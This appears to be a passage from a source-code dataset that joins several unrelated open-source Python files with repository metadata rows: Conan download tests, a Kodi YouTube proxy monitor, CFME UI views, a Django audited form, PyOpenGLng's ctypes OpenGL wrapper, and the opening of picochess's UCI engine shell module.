def test_download_package_argument(self):
server = TestServer()
servers = {"default": server}
client = TurboTestClient(servers=servers, users={"default": [("lasote", "mypass")]})
ref = ConanFileReference.loads("pkg/0.1@lasote/stable")
client.create(ref)
client.upload_all(ref)
client.remove_all()
client.run("download pkg/0.1@lasote/stable -p {}".format(NO_SETTINGS_PACKAGE_ID))
package_layout = client.cache.package_layout(ref)
package_folder = os.path.join(package_layout.packages(),
os.listdir(package_layout.packages())[0])
# Check not 'No remote binary packages found' warning
self.assertNotIn("WARN: No remote binary packages found in remote", client.out)
# Check at conanfile.py is downloaded
self.assertTrue(os.path.exists(package_layout.conanfile()))
# Check package folder created
self.assertTrue(os.path.exists(package_folder))
def test_download_not_found_reference(self):
server = TestServer()
servers = {"default": server}
client = TurboTestClient(servers=servers, users={"default": [("lasote", "mypass")]})
client.run("download pkg/0.1@lasote/stable", assert_error=True)
self.assertIn("ERROR: Recipe not found: 'pkg/0.1@lasote/stable'", client.out)
def test_no_user_channel(self):
# https://github.com/conan-io/conan/issues/6009
server = TestServer(users={"user": "password"}, write_permissions=[("*/*@*/*", "*")])
client = TestClient(servers={"default": server}, users={"default": [("user", "password")]})
client.save({"conanfile.py": GenConanfile()})
client.run("create . pkg/1.0@")
client.run("upload * --all --confirm")
client.run("remove * -f")
client.run("download pkg/1.0:{}".format(NO_SETTINGS_PACKAGE_ID))
self.assertIn("pkg/1.0: Downloading pkg/1.0:%s" % NO_SETTINGS_PACKAGE_ID, client.out)
self.assertIn("pkg/1.0: Package installed %s" % NO_SETTINGS_PACKAGE_ID, client.out)
# All
client.run("remove * -f")
client.run("download pkg/1.0@")
self.assertIn("pkg/1.0: Downloading pkg/1.0:%s" % NO_SETTINGS_PACKAGE_ID, client.out)
self.assertIn("pkg/1.0: Package installed %s" % NO_SETTINGS_PACKAGE_ID, client.out)
| mit | 2,105,040,354,864,572,400 | 43.408654 | 101 | 0.626827 | false |
repotvsupertuga/tvsupertuga.repository | plugin.video.youtube/resources/lib/youtube_plugin/kodion/utils/monitor.py | 1 | 2946 | import threading
from ..utils import get_proxy_server, is_proxy_live
import xbmc
import xbmcaddon
_addon = xbmcaddon.Addon('plugin.video.youtube')
class YouTubeMonitor(xbmc.Monitor):
def __init__(self, *args, **kwargs):
self._proxy_port = int(_addon.getSetting('kodion.mpd.proxy.port'))
self._old_proxy_port = self._proxy_port
self._use_proxy = _addon.getSetting('kodion.mpd.proxy') == 'true'
self.dash_proxy = None
self.proxy_thread = None
if self.use_proxy():
self.start_proxy()
xbmc.Monitor.__init__(self)
def onSettingsChanged(self):
_use_proxy = _addon.getSetting('kodion.mpd.proxy') == 'true'
_proxy_port = int(_addon.getSetting('kodion.mpd.proxy.port'))
if self._use_proxy != _use_proxy:
self._use_proxy = _use_proxy
if self._proxy_port != _proxy_port:
self._old_proxy_port = self._proxy_port
self._proxy_port = _proxy_port
if self.use_proxy() and not self.dash_proxy:
self.start_proxy()
elif self.use_proxy() and (self.old_proxy_port() != self.proxy_port()):
if self.dash_proxy:
self.restart_proxy()
elif not self.dash_proxy:
self.start_proxy()
elif not self.use_proxy() and self.dash_proxy:
self.shutdown_proxy()
def use_proxy(self):
return self._use_proxy
def proxy_port(self):
return int(self._proxy_port)
def old_proxy_port(self):
return int(self._old_proxy_port)
def proxy_port_sync(self):
self._old_proxy_port = self._proxy_port
def start_proxy(self):
if not self.dash_proxy:
xbmc.log('[plugin.video.youtube] DashProxy: Starting |{port}|'.format(port=str(self.proxy_port())), xbmc.LOGDEBUG)
self.proxy_port_sync()
self.dash_proxy = get_proxy_server(port=self.proxy_port())
if self.dash_proxy:
self.proxy_thread = threading.Thread(target=self.dash_proxy.serve_forever)
self.proxy_thread.daemon = True
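                #daemon thread: lets Kodi exit without waiting for serve_forever() to return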
self.proxy_thread.start()
def shutdown_proxy(self):
if self.dash_proxy:
xbmc.log('[plugin.video.youtube] DashProxy: Shutting down |{port}|'.format(port=str(self.old_proxy_port())), xbmc.LOGDEBUG)
self.proxy_port_sync()
self.dash_proxy.shutdown()
self.dash_proxy.socket.close()
self.proxy_thread.join()
self.proxy_thread = None
self.dash_proxy = None
def restart_proxy(self):
xbmc.log('[plugin.video.youtube] DashProxy: Restarting... |{old_port}| -> |{port}|'
.format(old_port=str(self.old_proxy_port()), port=str(self.proxy_port())), xbmc.LOGDEBUG)
self.shutdown_proxy()
self.start_proxy()
def ping_proxy(self):
return is_proxy_live(port=self.proxy_port())
| gpl-2.0 | -6,832,723,828,920,644,000 | 34.493976 | 135 | 0.590631 | false |
jkandasa/integration_tests | cfme/infrastructure/networking.py | 1 | 1954 | from navmazing import NavigateToAttribute
from widgetastic.widget import View
from widgetastic_patternfly import Dropdown
from cfme.base.ui import BaseLoggedInPage
from cfme.utils.appliance import Navigatable
from cfme.utils.appliance.implementations.ui import navigator, CFMENavigateStep
from widgetastic_manageiq import PaginationPane, ItemsToolBarViewSelector, Text
class InfraNetworking(Navigatable):
def __init__(self, appliance=None):
Navigatable.__init__(self, appliance)
class InfraNetworkingView(BaseLoggedInPage):
"""Base view for header and nav checking, navigatable views should inherit this"""
@property
def in_infra_networking(self):
nav_chain = ['Compute', 'Infrastructure', 'Networking']
return (
self.logged_in_as_current_user and
self.navigation.currently_selected == nav_chain)
class InfraNetworkingToolbar(View):
"""The toolbar on the main page"""
policy = Dropdown('Policy')
view_selector = View.nested(ItemsToolBarViewSelector)
class InfraNetworkingEntities(View):
"""Entities on the main page"""
title = Text('//div[@id="main-content"]//h1')
class InfraNetworkingAllView(InfraNetworkingView):
"""The "all" view -- a list"""
@property
def is_displayed(self):
return (
self.in_infra_networking and
self.entities.title.text == 'All Switches')
toolbar = View.nested(InfraNetworkingToolbar)
entities = View.nested(InfraNetworkingEntities)
paginator = PaginationPane()
@navigator.register(InfraNetworking, 'All')
class All(CFMENavigateStep):
VIEW = InfraNetworkingAllView
prerequisite = NavigateToAttribute('appliance.server', 'LoggedIn')
def step(self):
self.prerequisite_view.navigation.select('Compute', 'Infrastructure', 'Networking')
def resetter(self):
# Reset view and selection
self.view.toolbar.view_selector.select('Grid View')
| gpl-2.0 | 3,075,071,980,845,760,000 | 30.015873 | 91 | 0.716991 | false |
rdkls/django-audit-mongodb | djangoaudit/forms.py | 1 | 1925 | # -*- coding: utf-8 -*-
##############################################################################
#
# Copyright (c) 2010, 2degrees Limited <[email protected]>.
# All Rights Reserved.
#
# This file is part of djangoaudit <https://launchpad.net/django-audit/>,
# which is subject to the provisions of the BSD at
# <http://dev.2degreesnetwork.com/p/2degrees-license.html>. A copy of the
# license should accompany this distribution. THIS SOFTWARE IS PROVIDED "AS IS"
# AND ANY AND ALL EXPRESS OR IMPLIED WARRANTIES ARE DISCLAIMED, INCLUDING, BUT
# NOT LIMITED TO, THE IMPLIED WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST
# INFRINGEMENT, AND FITNESS FOR A PARTICULAR PURPOSE.
#
##############################################################################
"""
A module to store a version of django.forms.ModelForm to work with
djangoaudit.models.AuditedModel
"""
from django.forms import ModelForm
__all__ = ['AuditedModelForm']
class AuditedModelForm(ModelForm):
"""
A version of django.forms.ModelForm to allow operator and notes to be
specified to work with djangoaudit.models.AuditedModel
"""
def save(self, commit=True, operator=None, notes=None):
"""
Save the data in the form to the audited model instance.
:param commit: Whether to commit (see django docs for more info)
:type commit: :class:`bool`
:param operator: Optional operator to record against this save
:param notes: Optional notes to record against this save
"""
if not hasattr(self.instance, '_audit_info'):
raise AttributeError("Cannot save this form as the model instance "
"does not have the attribute '_audit_info'")
self.instance.set_audit_info(operator=operator, notes=notes)
        super(AuditedModelForm, self).save(commit=commit)
| bsd-3-clause | -479,323,673,763,812,700 | 36.764706 | 79 | 0.622338 | false |
FabriceSalvaire/PyOpenGLng | PyOpenGLng/Wrapper/CtypeWrapper.py | 1 | 33545 | ####################################################################################################
#
# PyOpenGLng - An OpenGL Python Wrapper with a High Level API.
# Copyright (C) 2014 Fabrice Salvaire
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
####################################################################################################
"""This module implements a ctypes wrapper for OpenGL based on information provided by the OpenGL
API :class:`PyOpenGLng.GlApi`.
"""
####################################################################################################
import six
####################################################################################################
import collections
import ctypes
import logging
import os
import subprocess
import sys
import types
import numpy as np
####################################################################################################
from .PythonicWrapper import PythonicWrapper
from PyOpenGLng.Tools.Timer import TimerContextManager
import PyOpenGLng.Config as Config
import PyOpenGLng.GlApi.Getter as Getter
####################################################################################################
_module_logger = logging.getLogger(__name__)
####################################################################################################
# Fixme: unsigned comes from typedef
# not gl, but translated c type in fact
__to_ctypes_type__ = {
'char':ctypes.c_char,
'int8_t':ctypes.c_byte, # c_int8
'uint8_t':ctypes.c_ubyte, # c_uint8
'unsigned char':ctypes.c_ubyte,
'short':ctypes.c_short,
'unsigned short':ctypes.c_ushort,
'int32_t':ctypes.c_int32,
'int':ctypes.c_int32, # not 64-bit integer!
'unsigned int':ctypes.c_uint32,
'int64_t':ctypes.c_int64,
'uint64_t':ctypes.c_uint64,
'float':ctypes.c_float,
'float_t':ctypes.c_float,
'double':ctypes.c_double,
'intptr_t':ctypes.c_void_p, # ?
'ptrdiff_t':ctypes.c_void_p, # int64 ?
'ssize_t':ctypes.c_uint64, # ?
}
__numpy_to_ctypes_type__ = {
'<u1':ctypes.c_uint8,
'<u2':ctypes.c_uint16,
'<u4':ctypes.c_uint32,
'<u8':ctypes.c_uint64,
'<i1':ctypes.c_int8,
'<i2':ctypes.c_int16,
'<i4':ctypes.c_int32,
'<i8':ctypes.c_int64,
'<f4':ctypes.c_float,
'<f8':ctypes.c_double,
}
def to_ctypes_type(parameter):
""" Return the ctypes type corresponding to a parameter. """
if parameter.is_generic_pointer():
return ctypes.c_void_p
else:
c_type = str(parameter.c_type)
return __to_ctypes_type__[c_type]
def numpy_to_ctypes_type(array):
""" Return the ctypes type corresponding to a Numpy array data type. """
return __numpy_to_ctypes_type__.get(array.dtype.str, None)
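# Illustrative sketch (not part of the original module): map a Numpy array
# dtype to its ctypes equivalent; True for a float32 array on little-endian
# platforms, where its dtype.str is '<f4'.
def _demo_numpy_to_ctypes_type():
    array = np.zeros(3, dtype=np.float32)
    return numpy_to_ctypes_type(array) is ctypes.c_float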
####################################################################################################
__command_directives__ = {
'glShaderSource':{'length':None,},
# length = NULL for null terminated string and solve len(pointer_parameters) == 2
}
####################################################################################################
def check_numpy_type(array, ctypes_type):
""" Check the Numpy array data type is same as *ctypes_type*. """
if numpy_to_ctypes_type(array) != ctypes_type:
raise ValueError("Type mismatch: %s instead of %s" % (array.dtype, ctypes_type.__name__))
####################################################################################################
class GlEnums(object):
##############################################
def __iter__(self):
for attribute in sorted(six.iterkeys(self.__dict__)):
if attribute.startswith('GL_'):
yield attribute
####################################################################################################
class GlCommands(object):
##############################################
def __iter__(self):
# for attribute, value in self.__dict__.iteritems():
# if attribute.startswith('gl'):
# yield value
for attribute in sorted(six.iterkeys(self.__dict__)):
if attribute.startswith('gl'):
yield getattr(self, attribute)
####################################################################################################
class ParameterWrapperBase(object):
# Fixme: wrapper, translator
""" Base class for parameter wrapper. """
##############################################
def repr_string(self, parameter):
return self.__class__.__name__ + '<' + parameter.format_gl_type() + '> ' + parameter.name
##############################################
def __repr__(self):
return self.repr_string(self._parameter)
####################################################################################################
class ParameterWrapper(ParameterWrapperBase):
""" Translate a fundamental type. """
##############################################
def __init__(self, parameter):
self._parameter = parameter
self._location = parameter.location # Fixme: doublon?
self._type = to_ctypes_type(parameter)
##############################################
def from_python(self, parameter, c_parameters):
c_parameters[self._location] = self._type(parameter)
return None
####################################################################################################
class PointerWrapper(ParameterWrapperBase):
""" Translate a pointer.
    This wrapper handles all the cases which are not managed by a :class:`ReferenceWrapper`, an
:class:`InputArrayWrapper` or an :class:`OutputArrayWrapper`.
These parameters are identified in the prototype as a pointer that doesn't have a size parameter
or a computed size.
    If the pointer type is *char* then the user must provide a string or a Python object with a
:meth:`__str__` method, else a Numpy array must be provided and the data type is only checked if
the pointer is not generic.
If the parameter value is :obj:`None`, the value is passed as is.
"""
_logger = _module_logger.getChild('PointerWrapper')
##############################################
def __init__(self, parameter):
# Fixme: same as ...
self._parameter = parameter
self._location = parameter.location
self._type = to_ctypes_type(parameter)
##############################################
def from_python(self, parameter, c_parameters):
if self._type == ctypes.c_char and self._parameter.const: # const char *
if self._logger.isEnabledFor(logging.DEBUG):
self._logger.debug('const char *')
if not isinstance(parameter, bytes):
parameter = six.b(parameter)
ctypes_parameter = ctypes.c_char_p(parameter)
elif isinstance(parameter, np.ndarray):
if self._logger.isEnabledFor(logging.DEBUG):
self._logger.debug('ndarray')
if self._type != ctypes.c_void_p:
check_numpy_type(parameter, self._type)
ctypes_parameter = parameter.ctypes.data_as(ctypes.POINTER(self._type))
elif parameter is None:
if self._logger.isEnabledFor(logging.DEBUG):
self._logger.debug('None')
ctypes_parameter = None # already done
else:
raise NotImplementedError
c_parameters[self._location] = ctypes_parameter
return None
####################################################################################################
class ReferenceWrapper(ParameterWrapperBase):
""" Translate a parameter passed by reference.
A parameter passed by reference is identified in the prototype as a non const pointer of a fixed
size of 1.
A reference parameter is removed in the Python prototype and the value set by the command is
pushed out in the return.
"""
##############################################
def __init__(self, parameter):
# Fixme: same as ...
self._parameter = parameter
self._location = parameter.location
self._type = to_ctypes_type(parameter)
##############################################
def from_python(self, c_parameters):
ctypes_parameter = self._type()
c_parameters[self._location] = ctypes.byref(ctypes_parameter)
to_python_converter = ValueConverter(ctypes_parameter)
return to_python_converter
####################################################################################################
class ArrayWrapper(ParameterWrapperBase):
""" Base class for Array Wrapper. """
##############################################
def __init__(self, size_parameter):
# Fixme: size_multiplier
# excepted some particular cases
pointer_parameter = size_parameter.pointer_parameters[0]
# Fixme: for debug
self._size_parameter = size_parameter
self._pointer_parameter = pointer_parameter
self._size_location = size_parameter.location
self._size_type = to_ctypes_type(size_parameter)
self._pointer_location = pointer_parameter.location
self._pointer_type = to_ctypes_type(pointer_parameter)
##############################################
def __repr__(self):
return self.repr_string(self._pointer_parameter)
####################################################################################################
class OutputArrayWrapper(ArrayWrapper):
""" Translate an output array parameter.
    If the pointer is generic, then the array is passed as a Numpy array and the size is specified
    in bytes. <<CHECK>>
If the pointer is of \*char type, then the size is passed by the user and a string is returned.
If the user passes an Numpy array, then the data type is checked and the size is set by the
wrapper.
If the user passes a size, then a Numpy (or a list) array is created and returned.
<<size_parameter_threshold>>
"""
_logger = _module_logger.getChild('OutputArrayWrapper')
size_parameter_threshold = 20
##############################################
def from_python(self, parameter, c_parameters):
# print self._pointer_parameter.long_repr(), self._pointer_type, type(parameter)
if self._pointer_type == ctypes.c_void_p:
if self._logger.isEnabledFor(logging.DEBUG):
self._logger.debug('void *')
# Generic pointer: thus the array data type is not specified by the API
if isinstance(parameter, np.ndarray):
# The output array is provided by user and the size is specified in byte
array = parameter
c_parameters[self._size_location] = self._size_type(array.nbytes)
ctypes_parameter = array.ctypes.data_as(ctypes.c_void_p)
c_parameters[self._pointer_location] = ctypes_parameter
return None
else:
raise NotImplementedError
elif self._pointer_type == ctypes.c_char:
if self._logger.isEnabledFor(logging.DEBUG):
self._logger.debug('char *')
# The array size is provided by user
size_parameter = parameter
c_parameters[self._size_location] = self._size_type(size_parameter)
ctypes_parameter = ctypes.create_string_buffer(size_parameter)
c_parameters[self._pointer_location] = ctypes_parameter
to_python_converter = StringConverter(ctypes_parameter)
return to_python_converter
elif isinstance(parameter, np.ndarray):
if self._logger.isEnabledFor(logging.DEBUG):
self._logger.debug('ndarray')
# Typed pointer
# The output array is provided by user
array = parameter
check_numpy_type(array, self._pointer_type)
c_parameters[self._size_location] = self._size_type(array.size)
ctypes_parameter = array.ctypes.data_as(ctypes.POINTER(self._pointer_type))
c_parameters[self._pointer_location] = ctypes_parameter
return None
else:
if self._logger.isEnabledFor(logging.DEBUG):
self._logger.debug('else')
# Typed pointer
# The array size is provided by user
size_parameter = parameter
c_parameters[self._size_location] = self._size_type(size_parameter)
if size_parameter >= self.size_parameter_threshold:
array = np.zeros((size_parameter), dtype=self._pointer_type)
ctypes_parameter = array.ctypes.data_as(ctypes.POINTER(self._pointer_type))
to_python_converter = IdentityConverter(array)
else:
array_type = self._pointer_type * size_parameter
ctypes_parameter = array_type()
to_python_converter = ListConverter(ctypes_parameter)
c_parameters[self._pointer_location] = ctypes_parameter
return to_python_converter
####################################################################################################
class InputArrayWrapper(ArrayWrapper):
_logger = _module_logger.getChild('InputArrayWrapper')
##############################################
def from_python(self, array, c_parameters):
# print array
# print self._pointer_parameter.long_repr()
# print self._pointer_type
if self._pointer_parameter.pointer == 2:
if self._pointer_type == ctypes.c_char: # Fixme: should be c_char_p
if isinstance(array, str):
if self._logger.isEnabledFor(logging.DEBUG):
self._logger.debug('string -> const char **')
size_parameter = 1
string_array_type = ctypes.c_char_p * 1
string_array = string_array_type(ctypes.c_char_p(six.b(array)))
else:
if self._logger.isEnabledFor(logging.DEBUG):
self._logger.debug('string array -> const char **')
size_parameter = len(array)
string_array_type = ctypes.c_char_p * size_parameter
string_array = string_array_type(*[ctypes.c_char_p(x) for x in array])
ctypes_parameter = string_array
else:
raise NotImplementedError
elif isinstance(array, np.ndarray):
if self._logger.isEnabledFor(logging.DEBUG):
self._logger.debug('ndarray')
if self._pointer_type == ctypes.c_void_p:
size_parameter = array.nbytes
elif self._pointer_type == ctypes.c_float: # fixme
size_parameter = 1 # array.shape[0]
# else:
# size_parameter = array.nbytes
# ctypes_parameter = array.ctypes.data_as(ctypes.c_void_p)
ctypes_parameter = array.ctypes.data_as(ctypes.POINTER(self._pointer_type))
        elif isinstance(array, collections.Iterable):
            size_parameter = len(array)
            array_type = self._pointer_type * size_parameter
            # a ctypes array must be initialized from unpacked items
            ctypes_parameter = array_type(*array)
else:
raise ValueError(str(array))
c_parameters[self._size_location] = self._size_type(size_parameter)
c_parameters[self._pointer_location] = ctypes_parameter
return None
####################################################################################################
class ToPythonConverter(object):
""" Base class for C to Python converter. """
##############################################
def __init__(self, c_object):
""" The parameter *c_object* is a ctype object. """
self._c_object = c_object
####################################################################################################
class IdentityConverter(ToPythonConverter):
""" Identity converter. """
def __call__(self):
return self._c_object
class ListConverter(ToPythonConverter):
""" Convert the C object to a Python list. """
def __call__(self):
return list(self._c_object)
class ValueConverter(ToPythonConverter):
""" Get the Python value of the ctype object. """
def __call__(self):
return self._c_object.value
class StringConverter(ToPythonConverter):
""" Get the Python value of the ctype object. """
def __call__(self):
value = self._c_object.value
if value is not None:
return value.decode('ascii')
else:
return None
####################################################################################################
class CommandNotAvailable(Exception):
pass
####################################################################################################
class GlCommandWrapper(object):
_logger = _module_logger.getChild('GlCommandWrapper')
##############################################
def __init__(self, wrapper, command):
self._wrapper = wrapper
self._command = command
self._number_of_parameters = command.number_of_parameters
self._call_counter = 0
try:
self._function = getattr(self._wrapper.libGL, str(command))
except AttributeError:
            raise CommandNotAvailable("OpenGL function %s was not found in libGL" % (str(command)))
# Only for simple prototype
# argument_types = [to_ctypes_type(parameter) for parameter in command.parameters]
# if argument_types:
# self._function.argtypes = argument_types
command_directive = __command_directives__.get(str(command), None)
self._parameter_wrappers = []
self._reference_parameter_wrappers = []
for parameter in command.parameters:
if parameter.type in ('GLsync', 'GLDEBUGPROC'):
raise NotImplementedError
parameter_wrapper = None
if command_directive and parameter.name in command_directive:
# Fixme: currently used for unspecified parameters (value set to 0)
pass # skip and will be set to None
elif parameter.pointer:
if parameter.size_parameter is None and parameter.array_size == 1:
# not const, array_size = 1 must be sufficient
parameter_wrapper = ReferenceWrapper(parameter)
elif parameter.size_parameter is None or parameter.computed_size:
parameter_wrapper = PointerWrapper(parameter)
else:
pass # skip and will be set by pointer parameter
elif parameter.pointer_parameters: # size parameter
# Fixme: len(pointer_parameters) > 1
# Only theses functions have len(pointer_parameters) > 1
# glAreTexturesResident
# glGetDebugMessageLog
# glPrioritizeTextures
# glShaderSource
pointer_parameter = parameter.pointer_parameters[0]
if pointer_parameter.const:
parameter_wrapper = InputArrayWrapper(parameter)
else:
parameter_wrapper = OutputArrayWrapper(parameter)
else:
parameter_wrapper = ParameterWrapper(parameter)
if parameter_wrapper is not None:
if isinstance(parameter_wrapper, ReferenceWrapper):
parameter_list = self._reference_parameter_wrappers
else:
parameter_list = self._parameter_wrappers
parameter_list.append(parameter_wrapper)
return_type = command.return_type
if return_type.type == 'GLsync':
raise NotImplementedError
elif return_type.type != 'void': # Fixme: .type or .c_type?
# Fixme: -> to func?
ctypes_type = to_ctypes_type(return_type)
if return_type.pointer:
if ctypes_type == ctypes.c_ubyte: # return type is char *
ctypes_type = ctypes.c_char_p
else:
raise NotImplementedError
self._function.restype = ctypes_type
self._return_void = False
else:
self._function.restype = None
self._return_void = True # Fixme: required or doublon?
# Getter
if command.name in Getter.commands_dict:
command_dict = Getter.commands_dict[command.name]
self._getter = {}
for enum, type_and_size in six.iteritems(command_dict):
try:
enum_value = getattr(wrapper.enums, enum)
self._getter[enum_value] = type_and_size
except AttributeError:
self._logger.warn("Enum {} not found".format(enum))
manual_page = self._manual_page()
if manual_page is not None:
doc = '%s - %s\n\n' % (self._command, manual_page.purpose)
else:
doc = ''
parameter_doc = ', '.join([repr(parameter_wrapper) for parameter_wrapper in self._parameter_wrappers])
self.__doc__ = doc + "%s (%s)" % (self._command, parameter_doc)
##############################################
def __call__(self, *args, **kwargs):
self._call_counter += 1
if len(self._parameter_wrappers) != len(args):
self._logger.warn("%s requires %u arguments, but %u was given\n %s\n %s",
str(self._command), len(self._parameter_wrappers), len(args),
self._command.prototype(),
str([parameter_wrapper.__class__.__name__
for parameter_wrapper in self._parameter_wrappers]))
# Initialise the input/output parameter array
c_parameters = [None]*self._number_of_parameters
to_python_converters = []
# Set the input parameters and append python converters for output
# first process the given parameters
for parameter_wrapper, parameter in zip(self._parameter_wrappers, args):
to_python_converter = parameter_wrapper.from_python(parameter, c_parameters)
if to_python_converter is not None:
to_python_converters.append(to_python_converter)
# second process the parameters by reference
for parameter_wrapper in self._reference_parameter_wrappers:
to_python_converter = parameter_wrapper.from_python(c_parameters)
if to_python_converter is not None:
to_python_converters.append(to_python_converter)
if self._logger.isEnabledFor(logging.DEBUG):
self._logger.debug('Call\n'
' ' + self._command.prototype() + '\n'
' ' + str([parameter_wrapper.__class__.__name__
for parameter_wrapper in self._parameter_wrappers]) + '\n'
' ' + str(c_parameters) + '\n'
' ' + str([to_python_converter.__class__.__name__
for to_python_converter in to_python_converters])
)
result = self._function(*c_parameters)
# Check error
if kwargs.get('check_error', False):
self._wrapper.check_error()
# Manage return
if to_python_converters:
output_parameters = [to_python_converter() for to_python_converter in to_python_converters]
if self._return_void:
# Extract uniq element
# Fixme: to func?, gives some cases to explain
if len(output_parameters) == 1:
output_parameter = output_parameters[0]
if isinstance(output_parameter, list) and len(output_parameter) == 1: # uniq output parameter is [a,]
# Fixme: could be worst than simpler, if we really expect a list
return output_parameter[0]
else:
return output_parameter
else:
return output_parameters
else:
return [result] + output_parameters
else:
if not self._return_void:
return result
##############################################
def __repr__(self):
return str(self._command.name) + ' ' + str(self._function.argtypes) + ' -> ' + str(self._function.restype)
##############################################
def _manual_page(self):
command_name = str(self._command)
        for name in ['man' + str(i) for i in range(4, 1, -1)]:
            # Fixme: use API version mapping
            manual = self._wrapper._manuals[name]
            if command_name in manual:
                return manual[command_name]
        return None
##############################################
def _xml_manual_name(self):
# some commands are merged together: e.g. glVertexAttrib.xml
page = self._manual_page()
if page is not None:
page_name = page.page_name
else:
page_name = str(self._command)
return page_name + '.xml'
##############################################
def xml_manual_path(self):
return os.path.join(Config.Path.manual_path(self._wrapper.api_number), self._xml_manual_name())
##############################################
def xml_manual_url(self, local=False):
if local:
return 'file://' + self.xml_manual_path()
else:
return 'http://www.opengl.org/sdk/docs/man/xhtml/' + self._xml_manual_name()
##############################################
def manual(self, local=False):
if sys.platform.startswith('linux'):
url = self.xml_manual_url(local)
browser = 'xdg-open'
subprocess.Popen([browser, url])
# import webbrowser
# webbrowser.open(url)
else:
raise NotImplementedError
##############################################
def help(self):
# Fixme: help(instance)
print(self.__doc__)
##############################################
@property
def call_counter(self):
return self._call_counter
##############################################
def reset_call_counter(self):
self._call_counter = 0
####################################################################################################
class CtypeWrapper(object):
libGL = None
_logger = _module_logger.getChild('CtypeWrapper')
##############################################
@classmethod
def load_library(cls, libGL_name):
cls.libGL = ctypes.cdll.LoadLibrary(libGL_name)
cls.libGL.glGetString.restype = ctypes.c_char_p
GL_VERSION = int('0x1F02', 16)
version_string = cls.libGL.glGetString(GL_VERSION)
if version_string is not None:
version_string = version_string.decode('ascii')
return version_string
##############################################
def __init__(self, gl_spec, api, api_number, profile=None, manuals=None):
# self._gl_spec = gl_spec
self.api_number = api_number
self._manuals = manuals
with TimerContextManager(self._logger, 'generate_api'):
api_enums, api_commands = gl_spec.generate_api(api, api_number, profile) # 0.080288 s
self._init_enums(api_enums)
self._init_commands(api_commands)
#!# self._pythonic_wrapper = PythonicWrapper(self)
##############################################
def _init_enums(self, api_enums):
gl_enums = GlEnums()
reverse_enums = {}
for enum in api_enums:
# We don't provide more information on enumerants, use GlAPI instead
enum_name, enum_value = str(enum), int(enum)
# store enumerants and commands at the same level
setattr(self, enum_name, enum_value)
# store enumerants in a dedicated place
setattr(gl_enums, enum_name, enum_value)
reverse_enums[enum_value] = enum_name
self.enums = gl_enums
self.reverse_enums = reverse_enums
##############################################
def _init_commands(self, api_commands):
gl_commands = GlCommands()
for command in six.itervalues(api_commands):
try:
command_name = str(command)
command_wrapper = GlCommandWrapper(self, command)
# store enumerants and commands at the same level
if hasattr(PythonicWrapper, command_name):
method = getattr(PythonicWrapper, command_name)
if six.PY3:
rebinded_method = types.MethodType(method, self)
else:
rebinded_method = types.MethodType(method.__func__, self, self.__class__)
setattr(self, command_name, rebinded_method)
else:
setattr(self, command_name, command_wrapper)
# store commands in a dedicated place
setattr(gl_commands, command_name, command_wrapper)
except NotImplementedError:
self._logger.warn("Command %s is not supported by the wrapper", str(command))
except CommandNotAvailable:
self._logger.warn("Command %s is not implemented by the vendor", str(command))
self.commands = gl_commands
##############################################
def check_error(self):
error_code = self.glGetError()
if error_code:
error_message = self._error_code_message(error_code)
raise NameError(error_message)
##############################################
def _error_code_message(self, error_code):
if not error_code:
# GL_NO_ERROR: The value of this symbolic constant is guaranteed to be 0.
return 'No error has been recorded.'
else:
if error_code == self.GL_INVALID_ENUM:
return 'An unacceptable value is specified for an enumerated argument.'
elif error_code == self.GL_INVALID_VALUE:
return 'A numeric argument is out of range.'
elif error_code == self.GL_INVALID_OPERATION:
return 'The specified operation is not allowed in the current state.'
elif error_code == self.GL_INVALID_FRAMEBUFFER_OPERATION:
return 'The framebuffer object is not complete.'
elif error_code == self.GL_OUT_OF_MEMORY:
return 'There is not enough memory left to execute the command.'
elif error_code == self.GL_STACK_UNDERFLOW:
return 'An attempt has been made to perform an operation that would cause an internal stack to underflow.'
elif error_code == self.GL_STACK_OVERFLOW:
return 'An attempt has been made to perform an operation that would cause an internal stack to overflow.'
else:
raise NotImplementedError
##############################################
def error_checker(self):
return ErrorContextManager(self)
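    # Hypothetical usage sketch (wrapper instance 'gl' assumed, not part of
    # the original module):
    #   with gl.error_checker():
    #       gl.glClear(gl.GL_COLOR_BUFFER_BIT)
    # raises NameError with a descriptive message if glGetError() reports an
    # error when the block exits.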
##############################################
def called_commands(self):
return [command for command in self.commands if command.call_counter]
##############################################
def reset_call_counter(self):
for command in self.commands:
command.reset_call_counter()
####################################################################################################
class ErrorContextManager(object):
##############################################
def __init__(self, wrapper):
self._wrapper = wrapper
##############################################
def __enter__(self):
pass
##############################################
def __exit__(self, type_, value, traceback):
self._wrapper.check_error()
####################################################################################################
#
# End
#
####################################################################################################
| gpl-3.0 | 1,990,613,322,482,558,700 | 36.606502 | 122 | 0.515397 | false |
LocutusOfPenguin/picochess | uci/engine.py | 1 | 9818 | # Copyright (C) 2013-2018 Jean-Francois Romang ([email protected])
# Shivkumar Shivaji ()
# Jürgen Précour ([email protected])
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import logging
import os
import configparser
import spur
import paramiko
from subprocess import DEVNULL
from dgt.api import Event
from utilities import EvtObserver
import chess.uci
from chess import Board
from uci.informer import Informer
from uci.read import read_engine_ini
class UciShell(object):
"""Handle the uci engine shell."""
def __init__(self, hostname=None, username=None, key_file=None, password=None):
super(UciShell, self).__init__()
if hostname:
logging.info('connecting to [%s]', hostname)
if key_file:
self.shell = spur.SshShell(hostname=hostname, username=username, private_key_file=key_file,
missing_host_key=paramiko.AutoAddPolicy())
else:
self.shell = spur.SshShell(hostname=hostname, username=username, password=password,
missing_host_key=paramiko.AutoAddPolicy())
else:
self.shell = None
def get_spur(self):
return self.shell
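# Illustrative sketch (not part of the original file): without a hostname the
# spur shell is None and the engine will be spawned locally; with SSH
# credentials the engine runs on the remote host.
def _demo_uci_shell():
    local = UciShell()
    return local.get_spur() is None  # True -> engine started with popen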
